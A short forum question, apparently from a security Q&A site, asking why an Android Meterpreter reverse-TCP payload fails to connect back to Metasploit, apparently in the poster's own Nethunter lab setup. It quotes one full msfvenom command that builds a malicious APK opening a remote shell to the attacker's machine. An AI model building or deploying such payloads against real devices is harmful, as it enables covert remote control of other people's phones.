Android Doesn't Connect Back to Metasploit with App Payload?
I am trying to connect my android device to metasploit via reverse tcp, but it never shows up on the console. I have a Nexus 5 running Nethunter and Android 5.1.1
The command I used was: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > base.apk
In my case, 192.168.43.124 is the attacker machine, and 4444 is the default port that Metasploit gave me. From my understanding, the phone's IP isn't important. I have tried this on multiple devices and networks and can't get it to connect.
Do I need to select architecture, or runtime?